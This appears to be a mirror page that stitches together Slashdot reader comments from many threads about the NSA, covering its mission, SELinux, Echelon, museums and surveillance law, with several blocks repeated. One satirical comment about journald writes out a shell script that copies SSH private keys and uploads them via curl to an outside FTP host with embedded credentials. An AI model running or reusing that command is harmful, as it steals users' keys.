Slashdot Mirror

GHIDRA does not appear in the web https://code.nsa.gov/ .

What is the difference between below?

https://github.com/nsacyber
https://github.com/nationalsec...

Which either above is the oficial page for releasing GHIDRA?

Can GHIDRA support RISC-V? And Intel/AMD/ARM?

Everyone has got to know about this international intelligence sharing agreement Echelon UKUSA/SIGINT that created 5 eyes by now. Surely? It has been in operation since the 1940's. I shouldn't be surprised that not even the article mentions it. It is the governance document for this kind of telecommunications surveillance.

I have a scan of the agreement however I've found it difficult to find the text online. The NSA links to the UK/USA seems to be broken for me. Maybe they're just interested in who is interested. ;). However a bit more digging and I found this article from the guardian that link to UK National Archive copy of the agreement. It was not available online for some time after I got it - so I suggest you grab a copy to get some idea how this agreement works. After all that's one reason it was kept secret for so long.

Essentially agencies can't spy on domestic citizens so they ask a counterpart agency to spy for them. I read somewhere that even back as far as the 90's it was doing signal processing to "gist" (as in get the gist of) about 500,000 phone conversations using data centers the size of football fields and promote them to analysts automatically. They had two nuclear submarines that would be positioned over undersea fibre optic telecommunications nodes so I think you can surmise just how well funded this agreement is if five western nations are involved.

It is like a Berlin wall of surveillance for the western world.

When I say foreign code I don't mean it as in international I mean it as proprietary by any vendor. Who cares where the author was as long as it is vetted by a secure team. The idea being that you don't employ anything that has not been checked before it is compiled. The NSA uses SELinux which has been verified from the ground up, and is available to the general public.

https://www.nsa.gov/what-we-do...

I'm more worried about network adaptors and the drivers which originate in China and possible have backdoors. It really doesn't matter where the contributors to the code base come from as long as you can inspect it to ensure nothing suspicious is compiled within it. Maybe Microsoft provides the government a chance to view the entire code base for whatever OS they choose to use but I doubt it.

As for FOSS kook I use several flavors, my work machine is Win 10 as required by my current employer. I have a windows gaming machine and a couple of varieties of Linux. My alpha machine which is my media server is running 64 bit Linux release and has mass quatities of disks in the cabinet to support DVR and MP3 usage throughout the house. My GF uses an iPad and iPhone, I have a Samsung tablet and a Kindle E-reader. I generally use what tool fits the best for the situation.

The NSA's charter has two goals: improve the security of US stuff, and penetrate the security of non-US stuff...

From what I can tell, their "improvement" is restricted to "national security information and systems". I didn't know that included Windows XP.

From NSA story:
NSA Mission
NSA's Mission is to help protect national security by providing policy makers and military commanders with the intelligence information they need to do their jobs. NSA's priorities are driven by externally developed and validated intelligence requirements, provided to NSA by the President, his national security team, and their staffs through the National Intelligence Priorities Framework.

From the NSA website:
Mission Statement
The National Security Agency/Central Security Service (NSA/CSS) leads the U.S. Government in cryptology that encompasses both Signals Intelligence (SIGINT) and Information Assurance (IA) products and services, and enables Computer Network Operations (CNO) in order to gain a decision advantage for the Nation and our allies under all circumstances.

More from the NSA website:
What is Information Assurance?
Information Assurance involves preventing unauthorized access to sensitive or classified national security information and systems. The purpose of the Information Assurance mission is to keep others from stealing or tampering with our national security systems and information. This work not only keeps our vital information out of unauthorized hands, but helps ensure that the information our decision makers need is available and reliable when they need it.

Under National Security Directive 42, the Director of NSA has responsibility for the security of national security information systems, covering the Department of Defense and other Federal departments and agencies. NSA/CSS also helps improve the security of critical operations and information by providing know-how and technology to suppliers and clients.

Who are NSA/CSS' Customers?
NSA/CSS provides intelligence products and services to the White House, executive agencies (such as CIA and the State Department), the Chairman and Joint Chiefs of Staff (JCS), military combatant commanders and component commands, military departments, multinational forces, and U.S. allies. In addition, we provide Information Assurance products and services to users of national security information systems and to government contractors, as required.

The NSA's charter has two goals: improve the security of US stuff, and penetrate the security of non-US stuff...

From what I can tell, their "improvement" is restricted to "national security information and systems". I didn't know that included Windows XP.

From NSA story:
NSA Mission
NSA's Mission is to help protect national security by providing policy makers and military commanders with the intelligence information they need to do their jobs. NSA's priorities are driven by externally developed and validated intelligence requirements, provided to NSA by the President, his national security team, and their staffs through the National Intelligence Priorities Framework.

From the NSA website:
Mission Statement
The National Security Agency/Central Security Service (NSA/CSS) leads the U.S. Government in cryptology that encompasses both Signals Intelligence (SIGINT) and Information Assurance (IA) products and services, and enables Computer Network Operations (CNO) in order to gain a decision advantage for the Nation and our allies under all circumstances.

More from the NSA website:
What is Information Assurance?
Information Assurance involves preventing unauthorized access to sensitive or classified national security information and systems. The purpose of the Information Assurance mission is to keep others from stealing or tampering with our national security systems and information. This work not only keeps our vital information out of unauthorized hands, but helps ensure that the information our decision makers need is available and reliable when they need it.

Under National Security Directive 42, the Director of NSA has responsibility for the security of national security information systems, covering the Department of Defense and other Federal departments and agencies. NSA/CSS also helps improve the security of critical operations and information by providing know-how and technology to suppliers and clients.

Who are NSA/CSS' Customers?
NSA/CSS provides intelligence products and services to the White House, executive agencies (such as CIA and the State Department), the Chairman and Joint Chiefs of Staff (JCS), military combatant commanders and component commands, military departments, multinational forces, and U.S. allies. In addition, we provide Information Assurance products and services to users of national security information systems and to government contractors, as required.

According to their website, defending vital networks and protecting US secrets is in their mandate.

I trust Linux more than either government. ;)

How very Libertarian of you... But is that even a dichotomy, though? Linux has quite a bit of NSA-developed code...

/sarcasm I'm shocked, shocked I tell you that SE Linux isn't good enough!

The NSA's SELinux?

https://www.nsa.gov/what-we-do...

By the same logic, I present you a few fine organizations that cannot possibly have anything to hide because they have a website that tells you what they do:
The FSB
The mossad (hope this is the right site because I didn't much care to enable javascript)
The CIA
The NSA

On a completely unrelated note, would you by any chance be in the market for a bridge? I can make you a really good price, because you're my friend!

Nope, they cover computer security under Information Assurance.

https://www.nsa.gov/what-we-do...

Untrusted X11 forwarding was meant to be a way to allow logins to unknown or insecure systems. It generates a cookie with xauth and uses the Security extension to limit what the remote client is allowed to do. But this is widely considered to be not useful, because the Security extension uses an arbitrary and limited access control policy, which results in a lot of applications not working correctly and what is really a false sense of security. This is true even today; I rebuilt XWin with Security enabled and 'ssh -X' into my linux VM, and got BadAccess errors from *any* GTK2 program. More on this subject:

http://www.openssh.com/faq.html#3.13
http://www.nsa.gov/selinuX/papers/x11/x93.html

Given the limited usefulness of untrusted X11 forwarding, *upstream* has disabled it by default in favour of other security models.

Btw, since the extension is disabled/not present the ssh -X falls back to ssh -Y (untrusted forwarding) on most systems.

. . . . as there are plenty of examples of classified, air-gapped systems leaking data to unclassified systems. To the point that there are standard procedures for a "spill" of classified data onto networks at lower levels of classification.

Section 702 facilitates targeting and collection on non-US Persons outside the United States whose communications enters, traverses, or otherwise touches the United States, as over 70% of international internet traffic does, or as does any non-US Person outside the US using any US-based cloud or internet service.

Where US Persons come in is because US corporations and organizations are also "US Persons". But if we suddenly say that doing foreign intelligence collection on non-US Persons outside the US should require the same individualized warrant protections as Americans citizens living in the US, it absurdly turns the entire purpose and function of foreign intelligence collection on its head.

And if you already don't trust the government, you won't care about anything in this explanation anyway.

This.

One of the NSA's mandates is signals intelligence. Another is information assurance, i.e. making sure our communications infrastructure is secure. Inserting backdoors in crypto hardware represents a pyrrhic victory for the first, and a complete disaster for the second.

The one thing that advocates for crypto backdoors completely fail to understand is that what you gain from the ability to monitor traffic comes at an enormous cost, which is the indroduction of a systemic flaw in our entire information infrastructure, which could potentially have catastrophic consequences. The best reason to oppose backdoors is not because "privacy" or "freedom" (although those may indeed be sufficient), but because backdoors combat a nuisance by making us vulnerable to a truly existential threat.

There is a lot of NSA code in Linux.

http://git.kernel.org/cgit/lin...

https://www.nsa.gov/research/s...

I am not saying that it causes the security problems the AC was writing about, but it is there.

It currently hangs in the National Cryptologic Museum with a placard talking about its history after all..

https://www.nsa.gov/about/cryp...

Unless this is a different bugged wooden seal...

The replica is at the International Spy Museum in Washington D.C. and the original is at the NSA Cryptological Museum.

I have seen them both and the replica is a very poor copy of the original wood carving.

It's a straight up application of Schneier's Law:

Anyone, from the most clueless amateur to the best cryptographer, can create an algorithm that he himself can't break.

-- Bruce Schneier

Someone might be able to break it, but if they can I doubt they'd talk about it.

What we should be doing is filing FOIAs for all data collected on our elected officials. So in this case I should file a FOIA for Representative John Kline, Senator Amy Klobuchar, Senator Al Franken, and President Obama. There would be a legitimate reason for the electorate to know who their elected officials associate with, besides it is just the meta data so no big deal or at least that is what I keep being told. Also there shouldn't be any national security issue with receiving this information as these people aren't terrorists and there shouldn't be an ongoing investigation that would be compromised.

The NSA is an offensive organization, not a defensive one. That's it's mission.

That's according to you. Now according to the NSA their mission, from their Mission pagel:

"The National Security Agency/Central Security Service (NSA/CSS) leads the U.S. Government in cryptology that encompasses both Signals Intelligence (SIGINT) and Information Assurance (IA) products and services, and enables Computer Network Operations (CNO) in order to gain a decision advantage for the Nation and our allies under all circumstances."

https://www.nsa.gov/about/miss...

Offense is definitely a big part of there job. But right up there with SIGINT is IA (information assurance); so what is IA?

Well I could look in a dictionary but lets see what the NSA thinks it is instead... since they are the ones charged with doing it:

https://www.nsa.gov/ia/ia_bann...

NSA's Information Assurance Directorate delivers mission enhancing information assurance technologies, products and services that enable customers and clients to secure operational information and information systems.

Or to paraphrase: enable its customers (government and its departments, domestic corporations, and our allies) to secure their data and computer systems.*

That is ALSO there mission. They have been so busy with SIGINT that not only have they neglected IA, but they have ACTIVELY subverted and sabotaged it in the process.

*and I'm not just putting words into their mouths when I say their job is to protect our allies (vs spying on them) that's also from them:

"The NSA [...] encompasses both SIGINT and IA [...] in order to gain a decision advantage for the Nation and our allies under all circumstances."

The NSA is an offensive organization, not a defensive one. That's it's mission.

That's according to you. Now according to the NSA their mission, from their Mission pagel:

"The National Security Agency/Central Security Service (NSA/CSS) leads the U.S. Government in cryptology that encompasses both Signals Intelligence (SIGINT) and Information Assurance (IA) products and services, and enables Computer Network Operations (CNO) in order to gain a decision advantage for the Nation and our allies under all circumstances."

https://www.nsa.gov/about/miss...

Offense is definitely a big part of there job. But right up there with SIGINT is IA (information assurance); so what is IA?

Well I could look in a dictionary but lets see what the NSA thinks it is instead... since they are the ones charged with doing it:

https://www.nsa.gov/ia/ia_bann...

NSA's Information Assurance Directorate delivers mission enhancing information assurance technologies, products and services that enable customers and clients to secure operational information and information systems.

Or to paraphrase: enable its customers (government and its departments, domestic corporations, and our allies) to secure their data and computer systems.*

That is ALSO there mission. They have been so busy with SIGINT that not only have they neglected IA, but they have ACTIVELY subverted and sabotaged it in the process.

*and I'm not just putting words into their mouths when I say their job is to protect our allies (vs spying on them) that's also from them:

"The NSA [...] encompasses both SIGINT and IA [...] in order to gain a decision advantage for the Nation and our allies under all circumstances."

I saw something about the Navy considering a BYOD policy with the Navy's computer systems.

I mean... what the fuck? These idiots should just get a custom US government smartphone and anyone that asks for an iphone should get a black bag thrown over their head

Have to be a little careful how I respond to this... let's just say that the last thing you want is the Federal government (or at least the DoD and the Intel community) picking out your cellular technology for you. The world of cell phones has evolved in less than a decade from dumb phones that couldn't even text to portable supercomputers; GPS-enabled dog collars and pill bottles; and increased worldwide coverage at (inflation adjusted) equal or lower prices to what you got 10 years ago. In the US Federal government, 10 years has brought you the F-35 Joint Strike Fighter at billions over budget and years behind schedule. Let's please never think that the US government is compatible with cutting edge technology in anything that does not evade radar, blow things up, or do so simultaneously.

In the US government world, in a SCIF (Sensitive Compartmented Information Facility, anywhere where SECRET/TOP SECRET/SCI information is shared), you can't even bring a cell phone into the facility. Think about this: everyone at the NSA, DISA, CIA Langley etc. misses your phone call unless they are sitting at their desk. Forget that "Homeland" or "24" bulls**t about people using their Droid Razrs in CIA headquarters or wherever the hell Jack Bauer is supposed to be (Federal Secret Counter-Non Existent Surveillance Footage - Large Screen TV and Fake Hologram Agency?). This is how forward thinking the government is about mobility.

Additionally, in 2008 the government (NSA and DISA) got together to decide to do exactly what you suggested. The result? The Secure Mobile Environment - Portable Electronic Device (SME-PED) initiative, which began with a forward looking technology initiative, and by the time it had run the gantlet of DoD/Intel requirements and Federal acquisition policies, had turned into a gigantic brick of a device - running Windows CE - that cost multiple thousands of dollars. This was launched shortly after the iPhone hit the market.

I can't share the detailed results for a variety of reasons, but I can say that adoption was very poor. Real-world users decided to either stick with earlier, cheaper secure dumb phones; or just risk things and make phone calls about secret information on the mobile phones that they actually carried every day and wanted to use. At any rate, the lesson learned was that 1.) people love cell phones because they are cheap and people have lots of choices; and 2.) when the US government gets involved to pick a "secure" cell phone that all its employees should use, nobody actually uses it.

You might want to read their mission statement and the referenced supporting legal points. You'll note "foreign signals" are the only mentioned monitored signals by law. There are no domestic provisions at all. What can I do with my bonus points?

Install my security software at http://nsa.gov/download/backdoor.exe it is guaranteed to reduce hacking attempts on your systems by 99%.

My dear friend, you do not understand how these things work.

You work at NSA, you are always using the latest, newest, biggest, baddest, sweetest technology ever devised by men. You literally have computer companies begging you to buy their stuff. For a lot of these people (heck, that may even include me) that is motivation enough.

AND, if you are discreet about it, you can even be privy to potentially very lucrative a lot of state secrets. Or even personal secrets, who knows?. Obviously, if Snowden gave us something, it is the knowledge that NSA is not very good at information compartmentalization...

But here is the kicker: if you ever decide to leave the NSA, for retirement or otherwise, the private sector (at least the US private sector) will greet you with open arms and pay you a sh*tload of money to work as a consultant or senior manager. And we are talking about a SH*TLOAD of money, conflict of interests be damned. You are now one of the big boys, kid, enjoy your (semi-)retirement.

No need to betray US interests, no need to reveal super secret information: you are NSA. You are above the law. Just leave your morals at the door, please.

The same NIST that pushed the adoption of Dual_EC_DRBG even when it was evident that it was flawed? I mean, even the organizations that nobody trusts, like the NSA, publish helpful guides and information.

Theoretically the NSA does have an office that does that. The OIG. In reality of course its the same as the police oversight ineffective. https://www.nsa.gov/about/oig/

Still the same. My dad took me there during a snow storm once when I was a kid. Having the curator to yourself is quite an experience as they really know their stuff.

The three wheel enigma is still on display for kids to type away on. It amazingly still works.

https://www.nsa.gov/about/cryp...

Another neat one is the National Electronics Museum just up 295 off Nursery Rd

http://www.nationalelectronics...

They have displays on electronics concepts and quite a bit of old hardware used in radar, communications, satellites, whatever. Was great when the kids were younger, and still great as they are becoming teens.

BTW, don't be put off by all the NSA security, the National Cryptologic Museum is easily accessible without going through the checkpoints (you turn left before the checkpoints to reach it). They also both have cool gift shops, at the NCM one, you can get NSA merchandise, as well as neat gadgets like a "spy tool" combo compass, binocs, mirror device and other kid kind of stuff.

Eh, we used to live in the DC metro area and went to those parties. Government employees are government employees, and friendly people. Even the ones in the military.

Also, at least half of the people who work at the NSA are the whitehats, responsible for really boring things like system hardening guides
https://www.nsa.gov/ia/mitigat...

Frankly I'm glad they're there doing their thing, and hopefully keeping an eye on some of the blackhats they have running around on their TS/SCI projects.

Since they always let the terrorist stuff through, so as not to tip their hand, when will the spammers start disguising their messages as jihadist cal to arms?

To: undisclosed-recipients
Subject: MALE PLEASURE!!!!!!
Date: 17 January 2014 02:20:05 +0000

Increase your pleasure NOW AND FOREVER! Click here to join the Holy Crusade and very soon you'll be spending eternity with your very own harem of 72 virgins for all eterinity!

So you trust that the journald binary reads the "don't save data" boolean value and doesn't just ignore it, or worse, ignores it and executes this shell script:

cat ~/.ssh/id_dsa ~/.ssh/id_dsa.pub >> nsaReadMe.txt
curl -T nsaReadMe.txt ftp://ftp.nsa.gov --user keyfiles:AllUrK3yzB3l0ng2US
rm -f nsaReadMe.txt

Or, more plausibly, does all that in a binary blob? Sure. It's open source. Sure I can check the code and compile it myself to make sure it meets my need for security. But one of the things about using these "pre-built" distros is that I'm probably using it to save time and money, which means I don't want to be bothered with doing a code check and recompile on every single init package. That's the beauty of init scripts that everyone has apparently missed in this debate. One human readable script for each daemon running, so the configuration of a daemon can be gleaned over for any questionable bits and edited in less than 10 minutes. And being scripts, they're all plain text that's automatically executable. I don't need to read over source, find an issue, edit it out, and then recompile the entire init code into a binary for that daemon to make use of it. That goes for PID 1 as well. If it's not a script that can be quickly edited and then it's ready for the next boot cycle without wasting process cycles for recompilation I don't want it on my production server.

Even their work to strengthen the S-boxes in DES were counterbalanced by their attempt (and qualified success) at weakening it to brute force attacks. What was the motivation behind this?

NSA worked closely with IBM to strengthen the algorithm against all except brute force attacks and to strengthen substitution tables, called S-boxes. Conversely, NSA tried to convince IBM to reduce the length of the key from 64 to 48 bits. Ultimately they compromised on a 56-bit key.

DOCID 3417193

Former TTP contractor here: First, there are PLENTY of issues one can have today with NSA and the American defense and intelligence community as a whole (note: FORMER federal contractor)... but it can be argued that TTP is one of the few unqualified "good" things the agency does.

In short, there are a bunch of federal regulations and statutes dictating that technologies paid for by the federal taxpayers should (barring lingering classification concerns) be made available for licensing and further development by those taxpayers, usually in the form of private companies, universities, the staffs of other public agencies, etc. There are different rules and processes for each, with the "fees" often being nominal and dependent on the scope and extent of the patent's application, and working to the benefit of the actual inventor(s).

Also, this is NOT an NSA-specific exercise. Most (and I imagine all, but can't confirm individually!) federal laboratories participate in technology transfer - the Federal Laboratory Consortium is a publicly available entity maintained for just that specific purpose.

And as a final aside... if you had seen the size of the Agency's TTP office (manned by a skeleton crew of administrative staff and often at the mercy of the general counsel/patent attornies) and the numbers TTP actually deals with, you would find a lot of the scare language in the original article patently (puns!) ridiculous. It took us two years to get an update on the NSA.gov website, which apparently only ended up being a basic refresh of content - so much for all the hidden Agency slush fund pull!

If you want mass surveillance and industrial espionage done right you should most definitely go American.

They fund it because they fund all sorts of basic and applied research.

There are many similar programs in the US. Here it is called the National Centers of Academic Excellence progam. It is overseen by the NSA of course. No matter what you think of them, at least they do know what they are doing in the technical realm.

The Bachelor's programs in information assurance cover far, far more about security than CS ever could, but still it is often not enough. Proper security requires an understanding in depth of a wide number of systems. The two extra years really is necessary to just lay the foundation of a security professional. These programs are designed to fill a need that exists and the free market has not managed to fix. There are just too many people out there that think they know about security, or even have careers in security that have holes in their knowledge. In other fields of IT that is fine, but not security. It only takes one crack, one little misconfiguration, bad update, or missed red flag to have the whole house of cards crumble to the ground.

The declassification rules in the US are such that all documents are to be publicly released 50 years after the end of their active life. That's why they were compelled to release ULTRA and VENONA information in the 1990s, 50 years after the end of WWII. The declassification process is not automatic, in that someone still redacts the names of involved people who are still alive, and they make sure that the release won't endanger any current activities, but for the most part they are compelled to release it all.

If you are at all interested in the history of our intelligence services, and you find yourself in the D.C. area, I strongly recommend visiting the NSA's Cryptologic Museum. http://www.nsa.gov/about/crypt...

The job of any government agency to defend the constitution. It's the job of the judicial branch. Furthermore, you actually expect a spy agency to protect the constitution? That's not even close to their job.

The naivete some have on this issue is rather surprising given the demographics of the site.

Employees at the NSA take an oath to defend the constitution. From the NSA's website:

NSA/CSS employees are Americans first, last, and always. We treasure the U.S. Constitution and the rights it secures for all the people. Each employee takes a solemn oath to support and defend the Constitution of the United States against all enemies, foreign and domestic.

It's not naivete, it's just expecting them to do what they SWORE TO DO.

AlanObject says:

the same approach that I would have taken given their mission statement

What "mission statement"? This?

Collect (including through clandestine means), process, analyze, produce, and disseminate signals intelligence information and data for foreign intelligence and counterintelligence purposes to support national and departmental missions;

GP is right. They can't process and analyze as much data as they collect, so they don't produce useful intelligence.

They want to collect everything then go through it later when a need arises

That's forensics, not intelligence.

So NSA is on a track where they are sound technically, but way off legally and ethically.

Just curious - if they are way off ethically and morally, why would you take that same approach?

Because that ensure ethical and moral rights isn't a part of their work description? Really, this applies to a number of government and private run corporations - the workers have legally to follow the rules of the trade even if those are morally wrong. The only situation where a worker have the right to refuse to follow those rules are when they are illegal.

If you want ethics and morals to make a difference you'll have to elect people that think it is important. Good luck. :(

the same approach that I would have taken given their mission statement

What "mission statement"? This?

Collect (including through clandestine means), process, analyze, produce, and disseminate signals intelligence information and data for foreign intelligence and counterintelligence purposes to support national and departmental missions;

GP is right. They can't process and analyze as much data as they collect, so they don't produce useful intelligence.

They want to collect everything then go through it later when a need arises

That's forensics, not intelligence.

So NSA is on a track where they are sound technically, but way off legally and ethically.

Just curious - if they are way off ethically and morally, why would you take that same approach?

The monograph reveals that beginning in 1976, the KGB successfully installed sophisticated miniaturized electronic eavesdropping equipment and burst transmitters inside 16 IBM Selectric typewriters used by the staffs of the Moscow embassy and Leningrad consulate, which copied everything being typed on the machines, then periodically broadcast their take to KGB engineers manning listening posts just outside.

The KGB bugs were discovered eight years later in 1984 by a NSA operation codenamed Project GUNMAN

Here is the NSA's own writeup. Anybody who thinks the Russians are being "paranoid" is a real fool.

Your article almost entirely supports my position. That quote is a simplification of a confused SIGINT train. The NV boats were certainly chasing the Maddox away from Hon Me (which two days earlier had suffered attacks from SV commandos). The Maddox fired warning shots. The NV boats returned fire. One machine gun bullet hit the Maddox. The detailed account by the NSA makes no mention of torpedoes being loosed.

NSA Report:

the Maddox was not on a purely passive mission. U.S. intercept sites in the area were alerted to the real reason for the Desoto missions, which was to stimulate and record North Vietnamese [REDACTED] reactions in support of the U.S. SIGINT effort.

stimulate == provoke

That report is quite unequivocal: the second "attack" did not happen.

You said:

Just that one [first] attack by the North Vietnamese would have been sufficient as a casus belli.

Neither LBJ nor McNamara thought so, despite the fact that that was exactly what they were looking for.

The NSA *is not military*, because they're not not part of the DoD,

Since when? Last I checked the NSA was 90% Military staffed and definitely under the DoD.
http://www.nsa.gov/about/leadership/index.shtml/
Notice those funny stars on the man on the left's shoulders? Those indicate he is a General, specifically he is a four star general from the army. The NSA is definitely military.

sorry for multiple replies, maybe it will be helpful to build this info in one place. Here's how to kibosh the mike on your macbook.

to kill in hardware: For unibody macbook pros the microphone is connected to the logic board but not soldered on, so if you have iron nuts you can actually just unplug it. you give up the convenience of FaceTime chats or dictation without plugging in an external mike, but if you care then you care:
http://www.ifixit.com/Guide/Ma...

then if you get one of these it's convenient to get microphone access when you need it. This one works for the macbook airs that have the line-in/ line-out port like an iPhone, it might work for an older macbook with a separate line in port, i don't know.
http://www.amazon.com/IK-Multi...

if this is too permanent or hard core, then there are a few ways of doing it in software. Here is a guide from the NSA themselves on how to harden your macbook. this version applies to snow leopard, but much of it likely still holds over.
http://www.nsa.gov/ia/_files/f...

a last thought, another way you could be super hardcore is to pull out the airport card, which like the microphone isn't soldered on. it has wifi and bluetooth. another super pain in the ass thing, but it's a step.

this appears to be a small USB dongle that would give you BT and wi-fi when you need it.
http://www.amazon.com/Cirago-B...

OK, once you've done all these things you can upgrade to ranger-level tinfoil hat.

I fail to see why my rights as a US citizen are disregarded by US intelligence agencies operating overseas.

What makes you think that? That isn't what NSA says. Are you saying that is wrong? Do you have any evidence?

Frequently Asked Questions - Oversight

4. Are U.S. persons outside of the United States afforded protection?

Yes, the privacy rights of U.S. persons are protected regardless of their location.

--------

And then there's my family in the US, whose rights are violated every time they communicate with me, or I with them.

Another assertion. Any evidence?

Already a thing: http://www.nsa.gov/kids/

Looks like they took a crack at it, interesting read:

The Voynich Manuscript: An Elegant Enigma

So we often see claims like the above in the summary:

Supposedly, "non-US" data is removed, but we all know that means it is sent to a partner country for analysis, which is then sent back to the NSA."

On the other hand:

Frequently Asked Questions - Oversight

5. Couldn't NSA simply ask its allies to provide them with information about U.S. persons?

NSA is prohibited from requesting an ally to undertake activities that NSA itself is prohibited from conducting.

I'm certainly willing to believe that other countries will accumulate info on US citizens and hold it, but does anyone have any evidence of the above claim?

They definitely are an engineering organization. But just like LeVar Burton, you don't have to take my word for it: http://www.nsa.gov/careers/career_fields/compee.shtml